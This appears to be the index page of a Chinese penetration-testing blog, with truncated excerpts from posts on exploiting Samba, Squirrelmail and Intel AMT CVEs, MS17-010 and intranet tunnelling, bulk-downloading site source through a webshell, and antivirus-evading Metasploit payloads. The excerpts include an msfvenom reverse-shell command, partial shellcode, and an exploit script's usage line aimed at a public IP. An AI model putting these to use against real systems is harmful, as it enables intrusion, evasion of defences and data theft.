热门 使用PHP自带zlib函数打包网站源码下载zip

时间:2017-7-20   作者:webbaozi   分类: 小技巧   热度:1738°    
时间:2017-7-20   分类: 小技巧    热度:1738  
打包网站源码使用,当不能执行命令时,有些大马由于写法问题,导致不能一次下载所有源码,所以从网上摘抄了代码做了下简单的修改。 代码如下: <?php //获取文件列表 function list_dir($dir){ $result = array(); if (is_dir($dir)){ $file_dir = scandir($dir); foreach($file_dir as $file){ if ($file == '.' || $file == '..'){ ...

阅读全文>>

热门 Samba远程代码执行漏洞利用

时间:2017-5-30   作者:webbaozi   分类: 渗透测试   热度:1342°    
时间:2017-5-30   分类: 渗透测试    热度:1342  
概述 linux或unix下所使用Samba服务允许恶意的用户上传类库到可读可写的共享目录进而导致服务器远程代码执行。 漏洞编号: CVE-2017-7494 漏洞等级: 严重 漏洞影响: Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本 默认端口: 445 漏洞复现 1.靶机环境搭建: 靶机环境系统使用kali: IP地址:192.168.10.62 [email protected]:/# uname -a Linux yunxu 4.9.0-kali3-amd64 ...

阅读全文>>

热门 Metasploit生成免杀payload笔记

时间:2017-5-22   作者:webbaozi   分类: 渗透测试   热度:1927°    
时间:2017-5-22   分类: 渗透测试    热度:1927  
msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 -i 11 -f py -o msf.py 然后更改z.py样式如下: from ctypes import * import ctypes buf = "" buf += "\xda\xca\xb8\x17\x5d\x14\x92\xd9\x74\x24\xf4\x5d\x29" buf += "\xc9\xb1\x97\x31\x45\x1a\x03\x45\x1a\x83\x...

阅读全文>>

热门 MS17-010漏洞检测与内网穿透技术的应用

时间:2017-5-15   作者:webbaozi   分类: 渗透测试   热度:4664°    
时间:2017-5-15   分类: 渗透测试    热度:4664  
0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问题的思路,同时也记录一下过程,加强记忆。 主要分为两个知识点,一是SMB漏洞的批量检测,二是内网穿透技术。 首先是环境的搭建,具体如下表所示: 主机 IP 备注 ...

阅读全文>>

热门 Squirrelmail远程代码执行漏洞(CVE-2017-7692)复现+修复方案

时间:2017-5-14   作者:webbaozi   分类: 渗透测试   热度:1371°    
时间:2017-5-14   分类: 渗透测试    热度:1371  
一:实验环境 操作机:kali2.0 目标机:Centos 6.0 Squirrelmail版本:1.4.22-4el6 二、漏洞原理 1、有一个可以登录的邮箱账号和密码 2、Squirrelmai的MAT(因特网邮件传送代理)需要配置Sendmail 3、Squirrelmail的edit_identity配置为true(默认配置) 该漏洞的触发点位于Squirrelmail源码中的Deliver_SendMail.class.php文件中,在initStream函数中,使用了escapeshellcmd()来过滤用户的信息,然后将处理后的字...

阅读全文>>

热门 CVE-2017-5689(Intel产品AMT)利用小脚本

时间:2017-5-11   作者:webbaozi   分类: 渗透测试   热度:1901°    
时间:2017-5-11   分类: 渗透测试    热度:1901  
检测脚本如下,使用方法: python CVE-2017-5689.py http://1.245.154.138:16992/index.htm #!/usr/bin/python # -*- coding: utf-8 -*- #by hackteam.cn import requests def exploit(url): status = False headers = {"User-Agent": "Mozilla/5.0"} httprsp = requests.get(url, headers=header...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1